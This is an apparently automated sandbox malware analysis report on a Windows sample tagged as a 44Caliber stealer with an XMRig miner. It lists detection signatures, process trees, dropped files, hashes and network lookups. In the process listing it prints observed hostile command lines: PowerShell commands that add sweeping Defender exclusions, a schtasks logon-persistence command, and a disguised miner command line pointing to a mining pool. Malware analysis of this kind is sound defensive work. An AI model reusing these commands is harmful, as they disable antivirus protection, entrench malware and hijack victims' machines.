Malware Analysis Report

2024-11-13 14:23

Sample ID 220320-fzvv6shffq
Target 65119209.exe
SHA256 5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67
Tags
44caliber xmrig miner spyware stealer evasion persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67

Threat Level: Known bad

The file 65119209.exe was found to be: Known bad.

Malicious Activity Summary

44caliber xmrig miner spyware stealer evasion persistence

xmrig

44Caliber

XMRig Miner Payload

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-20 05:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win10v2004-20220310-en

Max time kernel

156s

Max time network

179s

Command Line

C:\Windows\System32\svchost.exe -k netsvcs -p

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\65119209.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{64E89760-4E29-4916-A728-277A21692A89}.catalogItem C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C1C55260-69B0-486B-A42E-C18F74F47F11}.catalogItem C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4916 set thread context of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3900 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 3900 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 3900 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 3900 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 3900 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 3900 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 3900 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1156 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 1156 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 1156 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 1484 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 1484 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 1484 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Windows\SysWOW64\fondue.exe
PID 2472 wrote to memory of 2416 N/A C:\Windows\SysWOW64\fondue.exe C:\Windows\system32\FonDUE.EXE
PID 2472 wrote to memory of 2416 N/A C:\Windows\SysWOW64\fondue.exe C:\Windows\system32\FonDUE.EXE
PID 3928 wrote to memory of 2324 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 3928 wrote to memory of 2324 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 2324 wrote to memory of 3784 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3784 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 1756 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 3928 wrote to memory of 1756 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1756 wrote to memory of 4112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1756 wrote to memory of 4112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2324 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4436 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 3928 wrote to memory of 4436 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4436 wrote to memory of 4492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 4436 wrote to memory of 4492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 4492 wrote to memory of 4916 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 4492 wrote to memory of 4916 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 4492 wrote to memory of 4916 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 4916 wrote to memory of 5016 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4916 wrote to memory of 5016 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 5016 wrote to memory of 5072 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5016 wrote to memory of 5072 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 4000 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 4916 wrote to memory of 4000 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4916 wrote to memory of 4208 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 5016 wrote to memory of 4204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5016 wrote to memory of 4204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4000 wrote to memory of 4452 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 4000 wrote to memory of 4452 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 4000 wrote to memory of 4452 N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe

Processes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Users\Admin\AppData\Local\Temp\65119209.exe

"C:\Users\Admin\AppData\Local\Temp\65119209.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Windows\SysWOW64\fondue.exe

"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\system32\FonDUE.EXE

"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 4208 -ip 4208

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4208 -s 292

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 464 -p 4208 -ip 4208

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4208 -s 300

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 crl4.digicert.com udp
US 93.184.220.29:80 crl4.digicert.com tcp
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 93.184.220.29:80 crl4.digicert.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 93.184.220.29:80 crl4.digicert.com tcp
US 8.8.8.8:53 freegeoip.app udp
US 188.114.97.0:443 freegeoip.app tcp
US 93.184.220.29:80 crl4.digicert.com tcp

Files

memory/3900-134-0x0000000000400000-0x000000000093C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

memory/1352-141-0x0000000000380000-0x00000000003CA000-memory.dmp

memory/1352-142-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/1352-143-0x00000000022F0000-0x00000000022F2000-memory.dmp

memory/3928-144-0x0000029EFCBD0000-0x0000029EFCDF1000-memory.dmp

memory/3928-145-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/3928-146-0x0000029E99750000-0x0000029E99752000-memory.dmp

memory/3928-147-0x0000029EFEA80000-0x0000029EFEA92000-memory.dmp

memory/3928-148-0x0000029E99753000-0x0000029E99755000-memory.dmp

memory/3928-149-0x0000029E99756000-0x0000029E99757000-memory.dmp

memory/3784-151-0x00000219E1940000-0x00000219E1942000-memory.dmp

memory/3784-150-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/3784-152-0x00000219E1943000-0x00000219E1945000-memory.dmp

memory/3784-153-0x00000219E1900000-0x00000219E1922000-memory.dmp

memory/3784-154-0x00000219E1946000-0x00000219E1948000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a8e8360d573a4ff072dcc6f09d992c88
SHA1 3446774433ceaf0b400073914facab11b98b6807
SHA256 bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA512 4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

memory/4136-157-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4136-159-0x000001FAAA0F3000-0x000001FAAA0F5000-memory.dmp

memory/4136-158-0x000001FAAA0F0000-0x000001FAAA0F2000-memory.dmp

memory/4136-160-0x000001FAAA0F6000-0x000001FAAA0F8000-memory.dmp

memory/4136-161-0x000001FAAA0F8000-0x000001FAAA0F9000-memory.dmp

C:\Windows\System32\services64.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Windows\system32\services64.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 b245679121623b152bea5562c173ba11
SHA1 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60043e15d97bc9bf466a229c31d59463
SHA1 0ffdf799c4af5055caf6c5e6e20a7757c903af83
SHA256 d57675fec62cbf5ec9110a93b81ed55411830ef22e1719196632bdd3fca0c564
SHA512 47dde4c7e36ae73798d57f57d4e7ac7ca164297c14330911d50fcafa96b3b6211ccbb56b8cdc546214885ed99bdaa07b7a4aef62cd9e63d693ed7f6052541670

C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 3721b324b4d2c9dea6c6bc6a858fe337
SHA1 f3391c6414ed5bb89acc4ab5df2b837077a9a9c6
SHA256 fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206
SHA512 bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

C:\Windows\system32\Microsoft\Libs\sihost64.exe

MD5 3721b324b4d2c9dea6c6bc6a858fe337
SHA1 f3391c6414ed5bb89acc4ab5df2b837077a9a9c6
SHA256 fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206
SHA512 bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

memory/5072-168-0x00000264345B8000-0x00000264345B9000-memory.dmp

memory/4916-169-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4916-170-0x000001E764770000-0x000001E764772000-memory.dmp

memory/4916-171-0x000001E764773000-0x000001E764775000-memory.dmp

memory/4916-172-0x000001E764776000-0x000001E764777000-memory.dmp

memory/5072-173-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/5072-174-0x00000264345B0000-0x00000264345B2000-memory.dmp

memory/5072-175-0x00000264345B3000-0x00000264345B5000-memory.dmp

memory/5072-176-0x00000264345B6000-0x00000264345B8000-memory.dmp

memory/4208-177-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4208-178-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4208-179-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce4540390cc4841c8973eb5a3e9f4f7d
SHA1 2293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA512 2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

memory/4204-181-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4204-182-0x00000186D7440000-0x00000186D7442000-memory.dmp

memory/4204-183-0x00000186D7443000-0x00000186D7445000-memory.dmp

memory/4204-184-0x00000186D7446000-0x00000186D7448000-memory.dmp

memory/4452-185-0x00000238035A0000-0x00000238035A7000-memory.dmp

memory/4452-186-0x00007FFC045D0000-0x00007FFC05091000-memory.dmp

memory/4452-188-0x000002381F0E3000-0x000002381F0E5000-memory.dmp

memory/4452-187-0x000002381F0E0000-0x000002381F0E2000-memory.dmp

memory/4452-189-0x000002381F0E6000-0x000002381F0E7000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win7-20220310-en

Max time kernel

4294216s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\65119209.exe"

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
